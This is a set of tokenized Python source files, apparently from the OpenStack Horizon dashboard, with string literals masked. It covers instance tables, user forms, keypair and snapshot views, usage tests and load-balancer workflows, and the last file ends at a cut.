ipsecsiteconnection_delete ( request , ipsecsiteconnection_id ) : <EOL> neutronclient ( request ) . delete_ipsec_site_connection ( ipsecsiteconnection_id ) </s>
<s> GROUPS_INDEX_URL = '<STR_LIT>' <EOL> GROUPS_INDEX_VIEW_TEMPLATE = '<STR_LIT>' <EOL> GROUPS_CREATE_URL = '<STR_LIT>' <EOL> GROUPS_CREATE_VIEW_TEMPLATE = '<STR_LIT>' <EOL> GROUPS_UPDATE_URL = '<STR_LIT>' <EOL> GROUPS_UPDATE_VIEW_TEMPLATE = '<STR_LIT>' <EOL> GROUPS_MANAGE_URL = '<STR_LIT>' <EOL> GROUPS_MANAGE_VIEW_TEMPLATE = '<STR_LIT>' <EOL> GROUPS_ADD_MEMBER_URL = '<STR_LIT>' <EOL> GROUPS_ADD_MEMBER_VIEW_TEMPLATE = '<STR_LIT>' <EOL> GROUPS_ADD_MEMBER_AJAX_VIEW_TEMPLATE = '<STR_LIT>' </s>
<s> from django . template . defaultfilters import timesince <EOL> from django . template . defaultfilters import title <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tables <EOL> from horizon . utils import filters <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . dashboards . project . instances import tables as project_tables <EOL> class AdminEditInstance ( project_tables . EditInstance ) : <EOL> url = "<STR_LIT>" <EOL> class MigrateInstance ( tables . BatchAction ) : <EOL> name = "<STR_LIT>" <EOL> action_present = _ ( "<STR_LIT>" ) <EOL> action_past = _ ( "<STR_LIT>" ) <EOL> data_type_singular = _ ( "<STR_LIT>" ) <EOL> data_type_plural = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def allowed ( self , request , instance ) : <EOL> return ( ( instance . status in project_tables . ACTIVE_STATES <EOL> or instance . status == '<STR_LIT>' ) <EOL> and not project_tables . is_deleting ( instance ) ) <EOL> def action ( self , request , obj_id ) : <EOL> api . nova . server_migrate ( request , obj_id ) <EOL> class AdminUpdateRow ( project_tables . UpdateRow ) : <EOL> def get_data ( self , request , instance_id ) : <EOL> instance = super ( AdminUpdateRow , self ) . get_data ( request , instance_id ) <EOL> tenant = api . keystone . tenant_get ( request , <EOL> instance . tenant_id , <EOL> admin = True ) <EOL> instance . tenant_name = getattr ( tenant , "<STR_LIT:name>" , None ) <EOL> return instance <EOL> class AdminInstanceFilterAction ( tables . FilterAction ) : <EOL> def filter ( self , table , instances , filter_string ) : <EOL> """<STR_LIT>""" <EOL> q = filter_string . lower ( ) <EOL> return [ instance for instance in instances <EOL> if q in instance . name . lower ( ) ] <EOL> class AdminInstancesTable ( tables . DataTable ) : <EOL> TASK_STATUS_CHOICES = ( <EOL> ( None , True ) , <EOL> ( "<STR_LIT:none>" , True ) <EOL> ) <EOL> STATUS_CHOICES = ( <EOL> ( "<STR_LIT>" , True ) , <EOL> ( "<STR_LIT>" , True ) , <EOL> ( "<STR_LIT>" , True ) , <EOL> ( "<STR_LIT>" , True ) , <EOL> ( "<STR_LIT:error>" , False ) , <EOL> ) <EOL> tenant = tables . Column ( "<STR_LIT>" , verbose_name = _ ( "<STR_LIT>" ) ) <EOL> host = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) , <EOL> classes = ( '<STR_LIT>' , ) ) <EOL> name = tables . Column ( "<STR_LIT:name>" , <EOL> link = ( "<STR_LIT>" ) , <EOL> verbose_name = _ ( "<STR_LIT:Name>" ) ) <EOL> image_name = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> ip = tables . Column ( project_tables . get_ips , <EOL> verbose_name = _ ( "<STR_LIT>" ) , <EOL> attrs = { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> size = tables . Column ( project_tables . get_size , <EOL> verbose_name = _ ( "<STR_LIT>" ) , <EOL> classes = ( '<STR_LIT>' , ) , <EOL> attrs = { '<STR_LIT>' : '<STR_LIT:size>' } ) <EOL> status = tables . Column ( "<STR_LIT:status>" , <EOL> filters = ( title , filters . replace_underscores ) , <EOL> verbose_name = _ ( "<STR_LIT>" ) , <EOL> status = True , <EOL> status_choices = STATUS_CHOICES , <EOL> display_choices = <EOL> project_tables . STATUS_DISPLAY_CHOICES ) <EOL> task = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) , <EOL> filters = ( title , filters . replace_underscores ) , <EOL> status = True , <EOL> status_choices = TASK_STATUS_CHOICES , <EOL> display_choices = project_tables . TASK_DISPLAY_CHOICES ) <EOL> state = tables . Column ( project_tables . get_power_state , <EOL> filters = ( title , filters . replace_underscores ) , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> created = tables . Column ( "<STR_LIT>" , <EOL> verbose_name = _ ( "<STR_LIT>" ) , <EOL> filters = ( filters . parse_isotime , timesince ) ) <EOL> class Meta : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> status_columns = [ "<STR_LIT:status>" , "<STR_LIT>" ] <EOL> table_actions = ( project_tables . TerminateInstance , <EOL> AdminInstanceFilterAction ) <EOL> row_class = AdminUpdateRow <EOL> row_actions = ( project_tables . ConfirmResize , <EOL> project_tables . RevertResize , <EOL> AdminEditInstance , <EOL> project_tables . ConsoleLink , <EOL> project_tables . LogLink , <EOL> project_tables . CreateSnapshot , <EOL> project_tables . TogglePause , <EOL> project_tables . ToggleSuspend , <EOL> MigrateInstance , <EOL> project_tables . SoftRebootInstance , <EOL> project_tables . RebootInstance , <EOL> project_tables . TerminateInstance ) </s>
<s> import datetime <EOL> from django . core . urlresolvers import reverse <EOL> from django import http <EOL> from django . utils import timezone <EOL> from mox import IsA <EOL> from horizon . templatetags import sizeformat <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . test import helpers as test <EOL> from openstack_dashboard import usage <EOL> INDEX_URL = reverse ( '<STR_LIT>' ) <EOL> class UsageViewTests ( test . BaseAdminViewTests ) : <EOL> @ test . create_stubs ( { api . nova : ( '<STR_LIT>' , '<STR_LIT>' , ) , <EOL> api . keystone : ( '<STR_LIT>' , ) , <EOL> api . neutron : ( '<STR_LIT>' , ) , <EOL> api . network : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_usage ( self ) : <EOL> now = timezone . now ( ) <EOL> usage_obj = api . nova . NovaUsage ( self . usages . first ( ) ) <EOL> api . keystone . tenant_list ( IsA ( http . HttpRequest ) ) . AndReturn ( [ self . tenants . list ( ) , False ] ) <EOL> api . nova . usage_list ( IsA ( http . HttpRequest ) , <EOL> datetime . datetime ( now . year , <EOL> now . month , <EOL> now . day , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> datetime . datetime ( now . year , <EOL> now . month , <EOL> now . day , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) ) . AndReturn ( [ usage_obj ] ) <EOL> api . nova . tenant_absolute_limits ( IsA ( http . HttpRequest ) ) . AndReturn ( self . limits [ '<STR_LIT>' ] ) <EOL> api . neutron . is_extension_supported ( IsA ( http . HttpRequest ) , <EOL> '<STR_LIT>' ) . AndReturn ( True ) <EOL> api . network . tenant_floating_ip_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . floating_ips . list ( ) ) <EOL> api . network . security_group_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . q_secgroups . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( reverse ( '<STR_LIT>' ) ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertTrue ( isinstance ( res . context [ '<STR_LIT>' ] , usage . GlobalUsage ) ) <EOL> self . assertContains ( res , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( usage_obj . vcpus , <EOL> usage_obj . disk_gb_hours , <EOL> sizeformat . mbformat ( usage_obj . memory_mb ) , <EOL> usage_obj . vcpu_hours , <EOL> usage_obj . total_local_gb_usage ) ) <EOL> @ test . create_stubs ( { api . nova : ( '<STR_LIT>' , '<STR_LIT>' , ) , <EOL> api . keystone : ( '<STR_LIT>' , ) , <EOL> api . neutron : ( '<STR_LIT>' , ) , <EOL> api . network : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_usage_csv ( self ) : <EOL> now = timezone . now ( ) <EOL> usage_obj = [ api . nova . NovaUsage ( u ) for u in self . usages . list ( ) ] <EOL> api . keystone . tenant_list ( IsA ( http . HttpRequest ) ) . AndReturn ( [ self . tenants . list ( ) , False ] ) <EOL> api . nova . usage_list ( IsA ( http . HttpRequest ) , <EOL> datetime . datetime ( now . year , <EOL> now . month , <EOL> now . day , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> datetime . datetime ( now . year , <EOL> now . month , <EOL> now . day , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) ) . AndReturn ( usage_obj ) <EOL> api . nova . tenant_absolute_limits ( IsA ( http . HttpRequest ) ) . AndReturn ( self . limits [ '<STR_LIT>' ] ) <EOL> api . neutron . is_extension_supported ( IsA ( http . HttpRequest ) , <EOL> '<STR_LIT>' ) . AndReturn ( True ) <EOL> api . network . tenant_floating_ip_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . floating_ips . list ( ) ) <EOL> api . network . security_group_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . q_secgroups . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> csv_url = reverse ( '<STR_LIT>' ) + "<STR_LIT>" <EOL> res = self . client . get ( csv_url ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertTrue ( isinstance ( res . context [ '<STR_LIT>' ] , usage . GlobalUsage ) ) <EOL> hdr = '<STR_LIT>' <EOL> self . assertContains ( res , '<STR_LIT>' % ( hdr ) ) <EOL> for obj in usage_obj : <EOL> row = u'<STR_LIT>' . format ( obj . project_name , <EOL> obj . vcpus , <EOL> obj . memory_mb , <EOL> obj . disk_gb_hours , <EOL> obj . vcpu_hours ) <EOL> self . assertContains ( res , row ) </s>
<s> import logging <EOL> from django . forms import ValidationError <EOL> from django import http <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . views . decorators . debug import sensitive_variables <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from horizon import messages <EOL> from horizon . utils import validators <EOL> from openstack_dashboard import api <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class BaseUserForm ( forms . SelfHandlingForm ) : <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( BaseUserForm , self ) . __init__ ( request , * args , ** kwargs ) <EOL> project_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> user_id = kwargs [ '<STR_LIT>' ] . get ( '<STR_LIT:id>' , None ) <EOL> domain_id = kwargs [ '<STR_LIT>' ] . get ( '<STR_LIT>' , None ) <EOL> projects , has_more = api . keystone . tenant_list ( request , <EOL> domain = domain_id , <EOL> user = user_id ) <EOL> for project in projects : <EOL> if project . enabled : <EOL> project_choices . append ( ( project . id , project . name ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = project_choices <EOL> def clean ( self ) : <EOL> '''<STR_LIT>''' <EOL> data = super ( forms . Form , self ) . clean ( ) <EOL> if '<STR_LIT:password>' in data : <EOL> if data [ '<STR_LIT:password>' ] != data . get ( '<STR_LIT>' , None ) : <EOL> raise ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> return data <EOL> ADD_PROJECT_URL = "<STR_LIT>" <EOL> class CreateUserForm ( BaseUserForm ) : <EOL> domain_id = forms . CharField ( label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> widget = forms . HiddenInput ( ) ) <EOL> domain_name = forms . CharField ( label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> widget = forms . HiddenInput ( ) ) <EOL> name = forms . CharField ( label = _ ( "<STR_LIT>" ) ) <EOL> email = forms . EmailField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> required = False ) <EOL> password = forms . RegexField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . PasswordInput ( render_value = False ) , <EOL> regex = validators . password_validator ( ) , <EOL> error_messages = { '<STR_LIT>' : validators . password_validator_msg ( ) } ) <EOL> confirm_password = forms . CharField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> widget = forms . PasswordInput ( render_value = False ) ) <EOL> project = forms . DynamicChoiceField ( label = _ ( "<STR_LIT>" ) , <EOL> add_item_link = ADD_PROJECT_URL ) <EOL> role_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> roles = kwargs . pop ( '<STR_LIT>' ) <EOL> super ( CreateUserForm , self ) . __init__ ( * args , ** kwargs ) <EOL> role_choices = [ ( role . id , role . name ) for role in roles ] <EOL> self . fields [ '<STR_LIT>' ] . choices = role_choices <EOL> if api . keystone . VERSIONS . active >= <NUM_LIT:3> : <EOL> readonlyInput = forms . TextInput ( attrs = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . fields [ "<STR_LIT>" ] . widget = readonlyInput <EOL> self . fields [ "<STR_LIT>" ] . widget = readonlyInput <EOL> @ sensitive_variables ( '<STR_LIT:data>' ) <EOL> def handle ( self , request , data ) : <EOL> domain = api . keystone . get_default_domain ( self . request ) <EOL> try : <EOL> LOG . info ( '<STR_LIT>' % data [ '<STR_LIT:name>' ] ) <EOL> new_user = api . keystone . user_create ( request , <EOL> name = data [ '<STR_LIT:name>' ] , <EOL> email = data [ '<STR_LIT:email>' ] , <EOL> password = data [ '<STR_LIT:password>' ] , <EOL> project = data [ '<STR_LIT>' ] , <EOL> enabled = True , <EOL> domain = domain . id ) <EOL> messages . success ( request , <EOL> _ ( '<STR_LIT>' ) <EOL> % data [ '<STR_LIT:name>' ] ) <EOL> if data [ '<STR_LIT>' ] : <EOL> try : <EOL> api . keystone . add_tenant_user_role ( request , <EOL> data [ '<STR_LIT>' ] , <EOL> new_user . id , <EOL> data [ '<STR_LIT>' ] ) <EOL> except Exception : <EOL> exceptions . handle ( request , <EOL> _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> return new_user <EOL> except Exception : <EOL> exceptions . handle ( request , _ ( '<STR_LIT>' ) ) <EOL> class UpdateUserForm ( BaseUserForm ) : <EOL> domain_id = forms . CharField ( label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> widget = forms . HiddenInput ( ) ) <EOL> domain_name = forms . CharField ( label = _ ( "<STR_LIT>" ) , <EOL> required = False , <EOL> widget = forms . HiddenInput ( ) ) <EOL> id = forms . CharField ( label = _ ( "<STR_LIT>" ) , widget = forms . HiddenInput ) <EOL> name = forms . CharField ( label = _ ( "<STR_LIT>" ) ) <EOL> email = forms . EmailField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> required = False ) <EOL> password = forms . RegexField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . PasswordInput ( render_value = False ) , <EOL> regex = validators . password_validator ( ) , <EOL> required = False , <EOL> error_messages = { '<STR_LIT>' : validators . password_validator_msg ( ) } ) <EOL> confirm_password = forms . CharField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . PasswordInput ( render_value = False ) , <EOL> required = False ) <EOL> project = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( UpdateUserForm , self ) . __init__ ( request , * args , ** kwargs ) <EOL> if api . keystone . keystone_can_edit_user ( ) is False : <EOL> for field in ( '<STR_LIT:name>' , '<STR_LIT:email>' , '<STR_LIT:password>' , '<STR_LIT>' ) : <EOL> self . fields . pop ( field ) <EOL> if api . keystone . VERSIONS . active >= <NUM_LIT:3> : <EOL> readonlyInput = forms . TextInput ( attrs = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . fields [ "<STR_LIT>" ] . widget = readonlyInput <EOL> self . fields [ "<STR_LIT>" ] . widget = readonlyInput <EOL> @ sensitive_variables ( '<STR_LIT:data>' , '<STR_LIT:password>' ) <EOL> def handle ( self , request , data ) : <EOL> user = data . pop ( '<STR_LIT:id>' ) <EOL> data . pop ( '<STR_LIT>' , None ) <EOL> data . pop ( '<STR_LIT>' ) <EOL> data . pop ( '<STR_LIT>' ) <EOL> try : <EOL> response = api . keystone . user_update ( request , user , ** data ) <EOL> messages . success ( request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> except Exception : <EOL> response = exceptions . handle ( request , ignore = True ) <EOL> messages . error ( request , _ ( '<STR_LIT>' ) ) <EOL> if isinstance ( response , http . HttpResponse ) : <EOL> return response <EOL> else : <EOL> return True </s>
<s> """<STR_LIT>""" <EOL> from django . core . urlresolvers import reverse <EOL> from django . core . urlresolvers import reverse_lazy <EOL> from django import http <EOL> from django . template . defaultfilters import slugify <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . views . generic import TemplateView <EOL> from django . views . generic import View <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . dashboards . project . access_and_security . keypairs import forms as project_forms <EOL> class CreateView ( forms . ModalFormView ) : <EOL> form_class = project_forms . CreateKeypair <EOL> template_name = '<STR_LIT>' <EOL> success_url = '<STR_LIT>' <EOL> def get_success_url ( self ) : <EOL> return reverse ( self . success_url , <EOL> kwargs = { "<STR_LIT>" : self . request . POST [ '<STR_LIT:name>' ] } ) <EOL> class ImportView ( forms . ModalFormView ) : <EOL> form_class = project_forms . ImportKeypair <EOL> template_name = '<STR_LIT>' <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_object_id ( self , keypair ) : <EOL> return keypair . name <EOL> class DownloadView ( TemplateView ) : <EOL> def get_context_data ( self , keypair_name = None ) : <EOL> return { '<STR_LIT>' : keypair_name } <EOL> template_name = '<STR_LIT>' <EOL> class GenerateView ( View ) : <EOL> def get ( self , request , keypair_name = None ) : <EOL> try : <EOL> keypair = api . nova . keypair_create ( request , keypair_name ) <EOL> except Exception : <EOL> redirect = reverse ( '<STR_LIT>' ) <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) , <EOL> redirect = redirect ) <EOL> response = http . HttpResponse ( mimetype = '<STR_LIT>' ) <EOL> response [ '<STR_LIT>' ] = '<STR_LIT>' % slugify ( keypair . name ) <EOL> response . write ( keypair . private_key ) <EOL> response [ '<STR_LIT>' ] = str ( len ( response . content ) ) <EOL> return response </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> import horizon <EOL> from openstack_dashboard . dashboards . project import dashboard <EOL> class Databases ( horizon . Panel ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = '<STR_LIT>' <EOL> permissions = ( '<STR_LIT>' , ) <EOL> dashboard . Project . register ( Databases ) </s>
<s> """<STR_LIT>""" <EOL> from django . core . urlresolvers import reverse <EOL> from django . core . urlresolvers import reverse_lazy <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . dashboards . project . images_and_snapshots . snapshots import forms as project_forms <EOL> class CreateView ( forms . ModalFormView ) : <EOL> form_class = project_forms . CreateSnapshot <EOL> template_name = '<STR_LIT>' <EOL> success_url = reverse_lazy ( "<STR_LIT>" ) <EOL> def get_object ( self ) : <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> try : <EOL> self . _object = api . nova . server_get ( self . request , <EOL> self . kwargs [ "<STR_LIT>" ] ) <EOL> except Exception : <EOL> redirect = reverse ( '<STR_LIT>' ) <EOL> exceptions . handle ( self . request , <EOL> _ ( "<STR_LIT>" ) , <EOL> redirect = redirect ) <EOL> return self . _object <EOL> def get_initial ( self ) : <EOL> return { "<STR_LIT>" : self . kwargs [ "<STR_LIT>" ] } <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( CreateView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . get_object ( ) <EOL> return context </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from horizon . utils import fields <EOL> from horizon . utils import validators <EOL> from horizon import workflows <EOL> from openstack_dashboard import api <EOL> AVAILABLE_PROTOCOLS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> AVAILABLE_METHODS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class AddPoolAction ( workflows . Action ) : <EOL> name = forms . CharField ( max_length = <NUM_LIT> , label = _ ( "<STR_LIT:Name>" ) ) <EOL> description = forms . CharField ( <EOL> initial = "<STR_LIT>" , required = False , <EOL> max_length = <NUM_LIT> , label = _ ( "<STR_LIT>" ) ) <EOL> provider = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) , required = False ) <EOL> subnet_id = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> protocol = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> lb_method = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> admin_state_up = forms . BooleanField ( label = _ ( "<STR_LIT>" ) , <EOL> initial = True , required = False ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( AddPoolAction , self ) . __init__ ( request , * args , ** kwargs ) <EOL> tenant_id = request . user . tenant_id <EOL> subnet_id_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> try : <EOL> networks = api . neutron . network_list_for_tenant ( request , tenant_id ) <EOL> except Exception : <EOL> exceptions . handle ( request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> networks = [ ] <EOL> for n in networks : <EOL> for s in n [ '<STR_LIT>' ] : <EOL> subnet_id_choices . append ( ( s . id , s . cidr ) ) <EOL> self . fields [ '<STR_LIT>' ] . choices = subnet_id_choices <EOL> protocol_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> [ protocol_choices . append ( ( p , p ) ) for p in AVAILABLE_PROTOCOLS ] <EOL> self . fields [ '<STR_LIT>' ] . choices = protocol_choices <EOL> lb_method_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> [ lb_method_choices . append ( ( m , m ) ) for m in AVAILABLE_METHODS ] <EOL> self . fields [ '<STR_LIT>' ] . choices = lb_method_choices <EOL> try : <EOL> if api . neutron . is_extension_supported ( request , '<STR_LIT>' ) : <EOL> provider_list = api . neutron . provider_list ( request ) <EOL> providers = [ p for p in provider_list <EOL> if p [ '<STR_LIT>' ] == '<STR_LIT>' ] <EOL> else : <EOL> providers = None <EOL> except Exception : <EOL> exceptions . handle ( request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> providers = [ ] <EOL> if providers : <EOL> default_providers = [ p for p in providers if p . get ( '<STR_LIT:default>' ) ] <EOL> if default_providers : <EOL> default_provider = default_providers [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] <EOL> else : <EOL> default_provider = None <EOL> provider_choices = [ ( p [ '<STR_LIT:name>' ] , p [ '<STR_LIT:name>' ] ) for p in providers <EOL> if p [ '<STR_LIT:name>' ] != default_provider ] <EOL> if default_provider : <EOL> provider_choices . insert ( <EOL> <NUM_LIT:0> , ( default_provider , <EOL> _ ( "<STR_LIT>" ) % default_provider ) ) <EOL> else : <EOL> if providers is None : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> else : <EOL> msg = _ ( "<STR_LIT>" ) <EOL> provider_choices = [ ( '<STR_LIT>' , msg ) ] <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs [ '<STR_LIT>' ] = True <EOL> self . fields [ '<STR_LIT>' ] . choices = provider_choices <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> permissions = ( '<STR_LIT>' , ) <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class AddPoolStep ( workflows . Step ) : <EOL> action_class = AddPoolAction <EOL> contributes = ( "<STR_LIT:name>" , "<STR_LIT:description>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def contribute ( self , data , context ) : <EOL> context = super ( AddPoolStep , self ) . contribute ( data , context ) <EOL> if data : <EOL> return context <EOL> class AddPool ( workflows . Workflow ) : <EOL> slug = "<STR_LIT>" <EOL> name = _ ( "<STR_LIT>" ) <EOL> finalize_button_name = _ ( "<STR_LIT>" ) <EOL> success_message = _ ( '<STR_LIT>' ) <EOL> failure_message = _ ( '<STR_LIT>' ) <EOL> success_url = "<STR_LIT>" <EOL> default_steps = ( AddPoolStep , ) <EOL> def format_status_message ( self , message ) : <EOL> name = self . context . get ( '<STR_LIT:name>' ) <EOL> return message % name <EOL> def handle ( self , request , context ) : <EOL> try : <EOL> api . lbaas . pool_create ( request , ** context ) <EOL> return True <EOL> except Exception : <EOL> return False <EOL> class AddVipAction ( workflows . Action ) : <EOL> name = forms . CharField ( max_length = <NUM_LIT> , label = _ ( "<STR_LIT:Name>" ) ) <EOL> description = forms . CharField ( <EOL> initial = "<STR_LIT>" , required = False , <EOL> max_length = <NUM_LIT> , label = _ ( "<STR_LIT>" ) ) <EOL> floatip_address = forms . ChoiceField ( <EOL> label = _ ( "<STR_LIT>" ) , <EOL> widget = forms . Select ( attrs = { '<STR_LIT>' : '<STR_LIT>' } ) , <EOL> required = False ) <EOL> other_address = fields . IPField ( required = False , <EOL> initial = "<STR_LIT>" , <EOL> version = fields . IPv4 , <EOL> mask = False ) <EOL> protocol_port = forms . IntegerField ( label = _ ( "<STR_LIT>" ) , min_value = <NUM_LIT:1> , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> validators = [ validators . validate_port_range ] ) <EOL> protocol = forms . ChoiceField ( label = _ ( "<STR_LIT>" ) ) <EOL> session_persistence = forms . ChoiceField ( <EOL> required = False , initial = { } , label = _ ( "<STR_LIT>" ) ) <EOL> cookie_name = forms . CharField ( <EOL> initial = "<STR_LIT>" , required = False , <EOL> max_length = <NUM_LIT> , label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> connection_limit = forms . IntegerField ( <EOL> required = False , min_value = - <NUM_LIT:1> , label = _ ( "<STR_LIT>" ) , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> admin_state_up = forms . BooleanField ( <EOL> label = _ ( "<STR_LIT>" ) , initial = True , required = False ) <EOL> def __init__ ( self , request , * args , ** kwargs ) : <EOL> super ( AddVipAction , self ) . __init__ ( request , * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> args [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> protocol_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> [ protocol_choices . append ( ( p , p ) ) for p in AVAILABLE_PROTOCOLS ] <EOL> self . fields [ '<STR_LIT>' ] . choices = protocol_choices <EOL> session_persistence_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> for mode in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> session_persistence_choices . append ( ( mode , mode ) ) <EOL> self . fields [ <EOL> '<STR_LIT>' ] . choices = session_persistence_choices <EOL> floatip_address_choices = [ ( '<STR_LIT>' , _ ( "<STR_LIT>" ) ) ] <EOL> self . fields [ '<STR_LIT>' ] . choices = floatip_address_choices <EOL> def clean ( self ) : <EOL> cleaned_data = super ( AddVipAction , self ) . clean ( ) <EOL> if ( cleaned_data . get ( '<STR_LIT>' ) == '<STR_LIT>' and <EOL> not cleaned_data . get ( '<STR_LIT>' ) ) : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> self . _errors [ '<STR_LIT>' ] = self . error_class ( [ msg ] ) <EOL> return cleaned_data <EOL> class Meta : <EOL> name = _ ( "<STR_LIT>" ) <EOL> permissions = ( '<STR_LIT>' , ) <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class AddVipStep ( workflows . Step ) : <EOL> action_class = AddVipAction <EOL> depends_on = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> contributes = ( "<STR_LIT:name>" , "<STR_LIT:description>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> def contribute ( self , data , context ) : <EOL> context = super ( AddVipStep , self ) . contribute ( data , context ) <EOL> return context <EOL> class AddVip ( workflows . Workflow ) : <EOL> slug = "<STR_LIT>" <EOL> name = _ ( "<STR_LIT>" ) <EOL> finalize_button_name = _ ( "<STR_LIT>" ) <EOL> success_message = _ ( '<STR_LIT>' ) <EOL> failure_message = _ ( '<STR_LIT>' ) <EOL> success_url = "<STR_LIT>" <EOL> default_steps 